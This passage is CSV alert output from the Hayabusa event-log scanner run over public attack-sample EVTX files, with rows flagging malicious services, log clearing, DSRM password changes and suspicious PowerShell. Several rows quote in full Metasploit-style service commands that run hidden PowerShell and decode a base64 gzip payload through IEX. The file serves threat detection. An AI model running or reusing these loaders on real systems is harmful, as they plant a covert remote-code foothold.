IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAKtM4FcCA71WbW/aSBD+3Er9D1aFhK0SDIQmTaRKt8YYCC8BHMxb0Wljr+2FxUvsdXjp9b/fGHBCrs0p1w9nJWLXM7P77DPP7NiNA1tQHkjr7Xy3qDfHSPr+4f27Lg7xUpIzD3VrxLSclFkX726swVp59w6sGda0R60/g60ufZXkKVqtdL7ENJhdX1fiMCSBOMzzNSJQFJHlPaMkkhXpL2nok5Cc3d7PiS2k71Lmz3yN8XvMjm7bCrZ9Ip2hwElsLW7jBF3eXDEq5Oy3b1llelac5asPMWaRnDW3kSDLvMNYVpF+KMmGd9sVkbNtaoc84q7ID2lwXsoPggi7pAOrPZI2ET53oqwCR4G/kIg4DKTnQyWrHHzkLAy7IbeR44QkgpB8I3jkCyJngpixnPSHPD1C6MeBoEsCdkFCvjJJ+EhtEuXrOHAY6RN3JnfIOj35W4Pk0yDw6opQyUFeXsPa5k7MyCE8q/yM9phQBZ6TpAIRPz68//DeTcUQ+3HR76L+qRZg9G66HxMAK3d5RPe+X6VCTmrDjljwcAvTzF0YE2UmTZNMTGczKYMnZu718GLqC56udlmDV1OLU2cGIccUZSK/tlt8CTbuTTUxv644nbg0IPo2wEtqp6KSf0U9cRnZnzafunUAm5w9GoijE0Y8LBIec9L057DqkoqnWC2mzCEhsiF9EaCCzCovwRxSI2cbQZssganDPAtpcEHKJPU+yneb7p7MwSlbYTiKclI3hlqyc5JJMCNOTkJBRI8mFAu+H2af4bZjJqiNI5EuN1P+Qedx2woPIhHGNuQQKLgzV8SmmCWM5KQ6dYi2NamXbp/9JR8VzBgNPFjpEfIBbxIeTJEoIwSkiQqUvElEY7liZAku+9I2GPagkI+VsFcS9oiTfQVnqvWDsBNiUkZOUEK2TcZFTrJoKOCi2JMMyvotECc3xCmcSkiO2ZHT8plqW5EIPvNwEbkjY3PbTbR6JGpPSyiAEiPkSw1H5KJsihAIkz+qt7SC4Bk3Ata2tQUtojUtNtrwP6DnDa5fOs2beV0N9Y3vokbUaNe7eq9eLz/emFZZmNWGaHYbol0dzecmqvcHYzFpoPodLSzG5d3qhu7MFnLGG/Vip+3WBW2zm3uOO9Zd17t0zX7xs0Fbw0pPK5RwS6/GraG21grlqErX9R4d9BY3hrgfWwwPXNUbFa8w3bTCuVXk7V0DoZp/bu9uXKvmt53tuK5eDcsLVEWoElQtQ+PNsRairmphz+Lr5rzGhl4FaYZNyaQ3MLRez9DQoDZ/0K9UD2JH2NeGVolOVqO+D3MDIDTVQrnhkB0f94CkGkfY64OPVynZvgs++iekferwqIQXGkca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: TDhDnlnsrKrQVnjY : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: aCshIvAdgRYNApEv : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 07:30:41.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 12:38:31.282 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 21:48:41.553 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:43.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:07:44.086 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 22:09:46.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 23:21:12.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx -2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx -2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx -2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx -2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx -2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx -2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx -2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx -2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx -2017-08-31 04:15:23.660 